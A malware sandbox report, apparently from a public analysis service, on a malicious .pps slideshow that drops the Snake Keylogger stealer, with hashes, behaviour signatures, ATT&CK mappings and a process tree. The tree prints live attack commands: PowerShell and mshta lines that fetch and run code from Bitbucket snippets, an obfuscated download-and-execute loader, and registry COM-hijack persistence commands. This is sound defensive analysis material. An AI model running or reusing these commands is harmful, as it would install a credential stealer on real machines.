Overview

overview

10

Static

static

ae49324027...04.pps

windows7-x64

10

ae49324027...04.pps

windows10-2004-x64

10

Resubmissions

30-09-2022 23:49

220930-3vf8jsfbd3 10

30-09-2022 23:05

220930-23cdwsgahq 10

Analysis

  • max time kernel
    70s
  • max time network
    140s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    30-09-2022 23:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04.pps

  • Size

    102KB

  • MD5

    b47c0f0957935cfc3c27337b8f117d75

  • SHA1

    1228ae88cfc7a2a80506cd2e4fb14f22a5f8d76c

  • SHA256

    ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04

  • SHA512

    208edf3bf8dfb38d738a86db7a240c0ad985ed14b8f58435bcd945d4ca7904469c60bdcb3fb53f91d9f8d91d47c68b5ef26941b44cdb986959cc9e59e907e50e

  • SSDEEP

    768:kf9BcTRDkSIOd0Xg4JbvsyEVK3/L1U82cY3/A5jEcjo:kutY1OmvsyEVKvL1U0WA5js

Score
10/10
snakekeyloggercollectionkeyloggerpersistencestealer

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt

Signatures

  • Process spawned unexpected child process 3 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Snake Keylogger

    Keylogger and Infostealer first seen in November 2020.

    stealerkeyloggersnakekeylogger
  • Snake Keylogger payload 2 IoCs
  • Blocklisted process makes network request 4 IoCs
  • Registers COM server for autorun 1 TTPs 2 IoCs
    persistence
  • Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
    collection
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of SetThreadContext 1 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Modifies registry class 4 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 11 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • outlook_office_path 1 IoCs
  • outlook_win_path 1 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\ae4932402776b79b18dac096d0afdcc986f7bef1459bfb9bb5675f2b074d8e04.pps" /ou ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2280
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c start /min PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/tinypro/LM4xGp/ed8727ba02924677655de204f9422df557005d3f/files/blessed-final.txt') -useB); Start-Sleep -Seconds 20
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:3648
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        PowerShell -ex Bypass -nOp -w 1 ;i'E'x(iwr('https://bitbucket.org/!api/2.0/snippets/tinypro/LM4xGp/ed8727ba02924677655de204f9422df557005d3f/files/blessed-final.txt') -useB); Start-Sleep -Seconds 20
        3⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:2124
        • C:\Windows\system32\cmd.exe
          "C:\Windows\system32\cmd.exe" /c start /min mshta https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1936
          • C:\Windows\system32\mshta.exe
            mshta https://bitbucket.org/!api/2.0/snippets/tinypro/rEG58e/000e903c314ad0a34dfaac0751c43024bbf2dadd/files/blessed2.txt
            5⤵
            • Blocklisted process makes network request
            PID:2184
  • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
    POWERSHELL $HPJSWDLAZGWFDZYDFHWGFRU = '[%9%{!)<60%7]643]%((!^]y%9%{!)<60%7]643]%((!^]t\+!{{@901}8-#+([)]#/=}&{0}#23{1=##<%9-+90*4+.IO.%9%{!)<60%7]643]%((!^]t{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6&{0}#23{1=##<%9-+90*4+{)]<5/]9928(@-%*})\<$@\+!{{@901}8-#+([)]#/=}_#=#9)<+/&53\+]}70#-*6d\+!{{@901}8-#+([)]#/=}{)]<5/]9928(@-%*})\<$@]'.Replace('%9%{!)<60%7]643]%((!^]','S').Replace('\+!{{@901}8-#+([)]#/=}','E').Replace('{)]<5/]9928(@-%*})\<$@','R').Replace('_#=#9)<+/&53\+]}70#-*6','A').Replace('&{0}#23{1=##<%9-+90*4+','M');$HFVVYPXEVBJEIVAVHEPLSDU = ($HPJSWDLAZGWFDZYDFHWGFRU -Join '')|&('I'+'EX');$HKLNYCJAXBTERCXRLWVDDRR = '[$0[-_<#)(+}%]\3%7\(5&#y$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[+&=#*$)4$<3}!1<)@3##5=m.N+&=#*$)4$<3}!1<)@3##5=*^(!+72@//61)!18$/<%8[.W+&=#*$)4$<3}!1<)@3##5=bR+&=#*$)4$<3}!1<)@3##5=qu+&=#*$)4$<3}!1<)@3##5=$0[-_<#)(+}%]\3%7\(5&#*^(!+72@//61)!18$/<%8[]'.Replace('$0[-_<#)(+}%]\3%7\(5&#','S').Replace('+&=#*$)4$<3}!1<)@3##5=','E').Replace('*^(!+72@//61)!18$/<%8[','T');$HHKOVSNBTTKFPLKUTNGTEHB = ($HKLNYCJAXBTERCXRLWVDDRR -Join '')|&('I'+'EX');$HTZCELDOJQNRIVJVBXAVZND = '\][0{2=!#**(#<)4$/{=^%r11+[/-}*(1}3(}]+(#)6[]a<!=7!}\7)9&$[[)/4/&[/&11+[/-}*(1}3(}]+(#)6[]'.Replace('\][0{2=!#**(#<)4$/{=^%','C').Replace('11+[/-}*(1}3(}]+(#)6[]','E').Replace('<!=7!}\7)9&$[[)/4/&[/&','T');$HJJPDTCBEJQGGUGWFGICSKF = '{!@{8=!@4!(52!5=$1_##*&5<22_0_)1\%*#}*(6[867tR&5<22_0_)1\%*#}*(6[867[={9}@&&6*48{8}6_+3%=*pon[={9}@&&6*48{8}6_+3%=*&5<22_0_)1\%*#}*(6[867'.Replace('{!@{8=!@4!(52!5=$1_##*','G').Replace('&5<22_0_)1\%*#}*(6[867','E').Replace('[={9}@&&6*48{8}6_+3%=*','S');$HYRGAIQZLYZNHUPAAKKHBKR = 'G!!((=#^55=^9&7^3$_4=1/t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@pon7({=\[#%*6@0088{}\43}@!!((=#^55=^9&7^3$_4=1/7({=\[#%*6@0088{}\43}@t[%\*\][6!)-[8$5!41<#1_!!((=#^55=^9&7^3$_4=1/am'.Replace('7({=\[#%*6@0088{}\43}@','S').Replace('!!((=#^55=^9&7^3$_4=1/','E').Replace('[%\*\][6!)-[8$5!41<#1_','R');$HSIYIVTRGVUTCUUELHVIWZX = '}2=29-^$/4!#%4_6^(9<@[&_/2\4*4=(\7_]}](4_\_)a^[<2_/^@429<&238}@][#=To&_/2\4*4=(\7_]}](4_\_)n^[<2_/^@429<&238}@][#='.Replace('}2=29-^$/4!#%4_6^(9<@[','R').Replace('&_/2\4*4=(\7_]}](4_\_)','E').Replace('^[<2_/^@429<&238}@][#=','D');&('I'+'EX')($HFVVYPXEVBJEIVAVHEPLSDU::new($HHKOVSNBTTKFPLKUTNGTEHB::$HTZCELDOJQNRIVJVBXAVZND('https://bitbucket.org/!api/2.0/snippets/tinypro/AMyBo5/7aa8070fad88ee97f746dc619bfe09d8d55d7840/files/blessed1.txt').$HJJPDTCBEJQGGUGWFGICSKF().$HYRGAIQZLYZNHUPAAKKHBKR()).$HSIYIVTRGVUTCUUELHVIWZX())
    1⤵
    • Process spawned unexpected child process
    • Blocklisted process makes network request
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2976
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.ps1'"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4940
      • C:\Windows\System32\WScript.exe
        "C:\Windows\System32\WScript.exe" "C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs"
        3⤵
          PID:1436
    • C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exe
      POWERSHELL -noProfilE -ExEcutionPolicy Bypass -Command C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat
      1⤵
      • Process spawned unexpected child process
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:4856
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c ""C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat""
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:364
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f
          3⤵
          • Modifies registry class
          • Modifies registry key
          PID:4076
        • C:\Windows\system32\reg.exe
          REG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f
          3⤵
          • Registers COM server for autorun
          • Modifies registry class
          • Modifies registry key
          PID:4408
        • C:\Windows\system32\cmd.exe
          cMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1804
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1'"
            4⤵
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:2336
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              5⤵
              • Accesses Microsoft Outlook profiles
              • Suspicious behavior: EnumeratesProcesses
              • outlook_office_path
              • outlook_win_path
              PID:4988

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Initial Access

    Execution

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Privilege Escalation

    Defense Evasion

    Modify Registry

    1
    T1112

    Credential Access

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Lateral Movement

    Collection

    Email Collection

    1
    T1114

    Exfiltration

    Command and Control

    Web Service

    1
    T1102

    Impact

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\CYEBRRULVISVNIVUDGZPTV.ps1
      Filesize

      531KB

      MD5

      cf926b0be724d46e228175953d33a988

      SHA1

      4b87320b4a3b75be7414f82e3cc83abed0f2123b

      SHA256

      3a0b71b1c003590b1eb5a0f5e5e1ccf5af14fca8a264ff1f01c153c2a3806e00

      SHA512

      349ac83e0e2e14c6e9089020ce2c8f07800381840ea5ea574bc6b9ccf67ab603112efb9188950d495f1c18ffd36096aaf6a74d5bbaddc7a3ab13bc24ca7b3b40

      Download Submit
    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.bat
      Filesize

      693B

      MD5

      5a52e1c0f7e19f6b96c875310238e048

      SHA1

      6a017b2933ffb51c025fce852abd0e356b0e2b1d

      SHA256

      14e860c94a8664901099340f7a4f97362a64ef149a53e5df31a5a4d383a51d2a

      SHA512

      ddeb3ffd4c2c88c264c6c3587a33ac229afd44ed3a82fcf244e3069e8e0a28be328fded4b40d438185ccacbefb5ccd5d1df40292be825b0f9587b63fbc781f5d

      Download Submit
    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.ps1
      Filesize

      3KB

      MD5

      21df908f451a93e32692c2fe8b34162e

      SHA1

      25f4e917312bf21ad9289348b682a292e657cc4d

      SHA256

      ce05b804fdf14f27ab9617e55a7b431bba49325ae749a97a3ee9cff469b36e2e

      SHA512

      6f4d3f109fec3a9d92f36fae2d1eb2bea4c59dbe2b73e92e7f2175f2ca985b9c71f8905d4e6589d4cc010497403729bf7b718efb437f47fd819f16d74bea5ace

      Download Submit
    • C:\ProgramData\NJWDBWOESPINHONHYKUWZS\NJWDBWOESPINHONHYKUWZS.vbs
      Filesize

      2KB

      MD5

      1f420d8b494afee108abdbdce860be6d

      SHA1

      06029153e26d9a107f5831ab001f3e43ae6d4aae

      SHA256

      51bfac3e3d2230f21591bd59362c2f657a69614ea893a64644879f3010540275

      SHA512

      bf1e5b622141bb19096f6b8674b92579d0a045f7919beebdcca57f620900836e43d06f17d938697924942b0746087ddad902129887b7da3788256c0a0356d217

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.log
      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      e89c193840c8fb53fc3de104b1c4b092

      SHA1

      8b41b6a392780e48cc33e673cf4412080c42981e

      SHA256

      920b0533da0c372d9d48d36e09d752c369aec8f67c334e98940909bfcb6c0e6c

      SHA512

      865667a22e741c738c62582f0f06ea4559bb63a1f0410065c6fb3da80667582697aba2e233e91068c02d9ab4fb5db282a681fe8234f4c77a5309b689a37ac3a2

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      8e42bec1f8f4c3705f1df36c21c85531

      SHA1

      c9d6aac3c1b16ed12f22185ebdc9f921cd396d14

      SHA256

      f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2

      SHA512

      d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      1KB

      MD5

      8e42bec1f8f4c3705f1df36c21c85531

      SHA1

      c9d6aac3c1b16ed12f22185ebdc9f921cd396d14

      SHA256

      f3a91001711172cac5380d0409a531f64a8f85666188abb1e4fd0af070ddb9e2

      SHA512

      d8b5b5ad81d6d447a3e1994e3ffb8c75f91452599737bc40b5c0b11668300654b938e92f87718c3f01a70cad26b54f697eb6f70fe95c2dd2357ccd4b8bd24aa6

      Download Submit
    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
      Filesize

      64B

      MD5

      d8b9a260789a22d72263ef3bb119108c

      SHA1

      376a9bd48726f422679f2cd65003442c0b6f6dd5

      SHA256

      d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

      SHA512

      550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

      Download Submit
    • memory/364-164-0x0000000000000000-mapping.dmp
      Download
    • memory/1436-157-0x0000000000000000-mapping.dmp
      Download
    • memory/1804-171-0x0000000000000000-mapping.dmp
      Download
    • memory/1936-144-0x0000000000000000-mapping.dmp
      Download
    • memory/2124-159-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2124-142-0x0000015378700000-0x0000015378722000-memory.dmp
      Filesize

      136KB

      Download
    • memory/2124-141-0x0000000000000000-mapping.dmp
      Download
    • memory/2124-143-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2124-153-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2184-145-0x0000000000000000-mapping.dmp
      Download
    • memory/2280-149-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-134-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-137-0x00007FF9E3000000-0x00007FF9E3010000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-152-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-138-0x00007FF9E3000000-0x00007FF9E3010000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-136-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-133-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-132-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-150-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-135-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-151-0x00007FF9E5370000-0x00007FF9E5380000-memory.dmp
      Filesize

      64KB

      Download
    • memory/2280-139-0x0000018AE3F20000-0x0000018AE3F24000-memory.dmp
      Filesize

      16KB

      Download
    • memory/2336-175-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2336-176-0x000002246BD00000-0x000002246BD1A000-memory.dmp
      Filesize

      104KB

      Download
    • memory/2336-179-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2336-172-0x0000000000000000-mapping.dmp
      Download
    • memory/2976-168-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2976-154-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/2976-147-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/3648-140-0x0000000000000000-mapping.dmp
      Download
    • memory/4076-169-0x0000000000000000-mapping.dmp
      Download
    • memory/4408-170-0x0000000000000000-mapping.dmp
      Download
    • memory/4856-161-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4856-181-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4940-165-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4940-162-0x00007FF9FB2A0000-0x00007FF9FBD61000-memory.dmp
      Filesize

      10.8MB

      Download
    • memory/4940-155-0x0000000000000000-mapping.dmp
      Download
    • memory/4988-178-0x000000000042060E-mapping.dmp
      Download
    • memory/4988-177-0x0000000000400000-0x0000000000426000-memory.dmp
      Filesize

      152KB

      Download
    • memory/4988-182-0x0000000000960000-0x0000000000986000-memory.dmp
      Filesize

      152KB

      Download
    • memory/4988-183-0x0000000005480000-0x0000000005A24000-memory.dmp
      Filesize

      5.6MB

      Download
    • memory/4988-184-0x0000000004F70000-0x000000000500C000-memory.dmp
      Filesize

      624KB

      Download
    • memory/4988-185-0x0000000006270000-0x0000000006432000-memory.dmp
      Filesize

      1.8MB

      Download
    • memory/4988-186-0x0000000006140000-0x00000000061D2000-memory.dmp
      Filesize

      584KB

      Download
    • memory/4988-187-0x00000000060F0000-0x00000000060FA000-memory.dmp
      Filesize

      40KB

      Download